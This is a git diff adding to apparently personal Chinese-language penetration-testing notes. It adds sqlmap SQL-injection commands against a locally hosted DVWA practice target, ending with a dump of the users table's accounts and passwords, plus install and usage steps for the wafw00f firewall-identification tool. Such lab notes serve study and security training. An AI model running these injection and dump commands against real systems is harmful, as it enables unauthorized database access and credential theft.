--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -126,6 +126,45 @@ ttl默认值
 
 - 数据库类型
 
+  - sql 注入 
+
+    - https://github.com/sqlmapproject/sqlmap  
+
+      git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev   获取工具
+
+      To get a list of basic options and switches use:
+
+      ```
+      python sqlmap.py -h
+      
+      本地搭建靶场
+      列出所有dbs
+      sqlmap -u "http://192.168.99.126/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="PHPSESSID=3j2nuel8fcg6g47v7f8volguur; security=low; security=low"  --dbs
+      
+      查询对应的db的表
+      sqlmap -u "http://192.168.99.126/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="PHPSESSID=3j2nuel8fcg6g47v7f8volguur; security=low; security=low" -D dvwa --tables
+      
+      查询当前数据库
+       
+      
+      sqlmap -u "http://192.168.99.126/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="PHPSESSID=3j2nuel8fcg6g47v7f8volguur; security=low; security=low"  --current-db --batch
+      
+      -T users --columns获取users表中的列名
+       
+      
+      sqlmap -u "http://192.168.99.126/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="PHPSESSID=3j2nuel8fcg6g47v7f8volguur; security=low; security=low"  -D dvwa -T users --columns --batch
+      
+      脱库： 显示用户表的账户密码
+      sqlmap -u "http://192.168.99.126/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="PHPSESSID=3j2nuel8fcg6g47v7f8volguur; security=low; security=low"  -D dvwa -T users -C user,password,user_id --dump  
+      
+      
+      
+      
+      
+      
+      
+      ```
+
 - 脚本类型
 
 - 网站目录扫描
@@ -145,9 +184,20 @@ ttl默认值
   python3 dirmap.py -i http://192.168.99.126/DVWA-master/  -lcf   查看 网站目录
 
 -   waf  识别
+
   - 防止常见的网络攻击： sql注入，xss夸站攻击csrf、网页后门攻击
+
   - 防止各类自动化攻击，如：暴力破解、撞库、批量注册、自动发帖
+
   - 其他，如：爬虫、0day攻击、代码分析、嗅探、数据篡改、越权访问、敏感信息泄漏、应用ddos、远程恶意包含、盗链、越权、扫描等
+
+    https://github.com/EnableSecurity/wafw00f  识别工具地址
+
+    python setup.py install
+
+    ```
+    wafw00f https://example.org
+    ```
 
 #### zenmap
 
